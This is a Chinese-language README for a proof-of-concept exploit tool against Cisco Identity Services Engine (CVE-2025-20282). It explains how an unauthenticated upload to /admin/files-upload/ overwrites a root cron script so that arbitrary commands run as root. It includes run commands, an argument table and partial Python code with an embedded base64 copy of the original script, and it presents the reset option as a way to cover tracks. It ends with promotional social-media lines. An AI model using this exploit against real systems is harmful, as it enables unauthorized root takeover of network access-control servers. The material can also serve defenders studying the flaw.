Cisco ISE 权限提升漏洞利用工具 (CVE-2025-20282)
Cisco ISE 权限提升漏洞利用工具 (CVE-2025-20282)
这是一个针对 Cisco Identity Services Engine (ISE) 中高危漏洞 (CVE-2025-20282) 的概念验证 (PoC) 利用工具。该工具展示了如何通过未授权的文件上传功能,将恶意文件植入目标系统,最终实现以 Root 权限执行任意命令。
功能特性
- 未授权利用:利用
/admin/files-upload/接口,无需任何身份验证即可上传文件。 - 命令注入:允许攻击者在目标系统上以 Root 权限执行任意系统命令。
- 文件恢复:提供
--reset参数,可将被篡改的系统文件恢复到原始状态,增加了隐蔽性和可测试性。 - 自动化打包:自动创建恶意文件并打包成 ZIP 压缩包,模拟目标系统的文件结构。
- 权限提升:利用系统计划任务,将普通命令执行提升为最高权限 (Root) 的执行。
安装指南
系统要求
- Python 3.x
- 目标系统:存在漏洞的 Cisco ISE 设备
依赖项
本脚本仅依赖 Python 标准库,无需安装额外的第三方包。
安装步骤
- 将本项目的 Python 脚本下载到您的攻击机。
- 确保攻击机可以与目标 Cisco ISE 设备的网络互通。
- 赋予脚本执行权限(如果需要):
chmod+x exploit.py
使用说明
基础使用示例
该脚本通过命令行参数指定目标 IP 和要执行的命令。
1. 执行恶意命令
以下示例将在目标 Cisco ISE 设备上以 Root 权限执行id命令,并将结果写入/tmp/pwned文件。
python exploit.py --ip192.168.1.100 --command"id > /tmp/pwned"执行流程:
- 脚本创建一个临时的
bin目录。 - 在
bin目录下生成isehourlycron.sh文件,内容为原始系统脚本 + 您指定的命令。 - 将
bin目录打包成output.zip。 - 将
output.zip通过未授权接口上传到目标服务器 (192.168.1.100)。 - 目标系统会自动解压该文件,覆盖
/opt/CSCOcpm/bin/isehourlycron.sh。 - 等待系统计划任务执行该脚本,您指定的命令将以 Root 权限运行。
2. 恢复原始文件
如果您需要清除痕迹或恢复到初始状态,可以使用--reset参数。
python exploit.py --ip192.168.1.100 --reset该命令会上传一个只包含原始内容、不含恶意命令的isehourlycron.sh文件,覆盖被篡改的文件。
参数概览
| 参数 | 类型 | 必填 | 描述 |
|---|---|---|---|
--ip | str | 是 | 目标 Cisco ISE 设备的 IP 地址。 |
--command | str | 否* | 要在目标系统上执行的命令。 |
--reset | flag | 否* | 重置模式。如果设置此标志,将忽略--command,恢复原始文件。 |
核心代码
1. 参数解析与配置
脚本使用argparse解析用户输入的参数,包括目标 IP、要执行的命令以及重置标志。这些参数决定了脚本的运行模式。
importargparse parser=argparse.ArgumentParser(description="PoC with --reset flag to toggle behavior.")parser.add_argument('--reset',action='store_true',help='Trigger reset behavior')parser.add_argument('--command',type=str,required=True,help='Command to be executed')parser.add_argument('--ip',type=str,required=True,help='Target IP address')args=parser.parse_args()COMMAND=args.command IP=args.ip2. 恶意文件生成
脚本的核心逻辑之一是生成被篡改的系统文件。原始系统文件内容以 Base64 编码硬编码在脚本中。解码后,脚本会根据--reset标志决定是在文件末尾追加恶意命令,还是保留原始内容。
# Original file under /opt/CSCOcpm/bin/ named isehourlycron.shisehourlycron="IyEvYmluL3NoCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojICAgICBGaWxlbmFtZTogaXNlaG91cmx5Y3Jvbi5zaAojICBEZXNjcmlwdGlvbjogU2hlbGwgc2NyaXB0IHRvIHBlcmZvcm0gaG91cmx5IGNsZWFudXAKIyAgICAgICAgVXNhZ2U6IENhbGxlZCBmcm9tIHN5c3RlbSBzY2hlZHVsZXIKIyAgICAgICBBdXRob3I6IGVkZGllbUBjaXNjby5jb20KIwojIENvcHlyaWdodCAoYykgMjAwOS0yMDE1IENpc2NvIFN5c3RlbXMsIEluYy4gIFRoaXMgcHJvZ3JhbSBjb250YWlucwojIHByb3ByaWV0YXJ5IGFuZCBjb25maWRlbnRpYWwgaW5mb3JtYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkCiMgZXhjZXB0IGFzIG1heSBiZSBwZXJtaXR0ZWQgYnkgcHJpb3Igd3JpdHRlbiBjb25zZW50LgojCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKc291cmNlIC9vcHQvQ1NDT2NwbS9jb25maWcvY3BtZW52LnNoCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIwojIElmIGF2YWlsYWJsZSBmaWxlc3lzdGVtIHNwYWNlIGRyb3BzIGJlbG93IDVHYiwgYW5kIHVuZG8gCiMgdW5kbyB0YWJsZXNwYWNlIGlzIG92ZXIgMTBHYiwgdGhlbiBkcm9wIGFuZCByZWNyZWF0ZQojIHRoZSB1bmRvIHRhYmxlc3BhY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSMKY2xlYW51cHVuZG90YWJsZXNwYWNlKCkKewogIAogICAgY2F0ID4gL3RtcC9kcm9wdW5kby5zcWwgPDwgRU9GCnNldCBzZXJ2ZXJvdXQgb247CmRlY2xhcmUKdmFyIHZhcmNoYXIyKDEwMDApOwpiZWdpbgpiZWdpbgpleGVjdXRlIGltbWVkaWF0ZSAnc2VsZWN0IE5BTUUgZnJvbSB1bmRvZHJvcCcgaW50byB2YXIgOwpFWENFUFRJT04gV0hFTiBPVEhFUlMgVEhFTiBudWxsOwpyZXR1cm47CmVuZDsKaWYgICB2YXI9Jw=="# 解码原始文件内容# 根据 --reset 标志决定是否追加命令# ... (后续处理逻辑)```FINISHED 6HFtX5dABrKlqXeO5PUv/8+rhoeqMCA1qzr2lMYiJ3GXrjM2WSU9FiWwYwOtmhhT 更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手) 对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)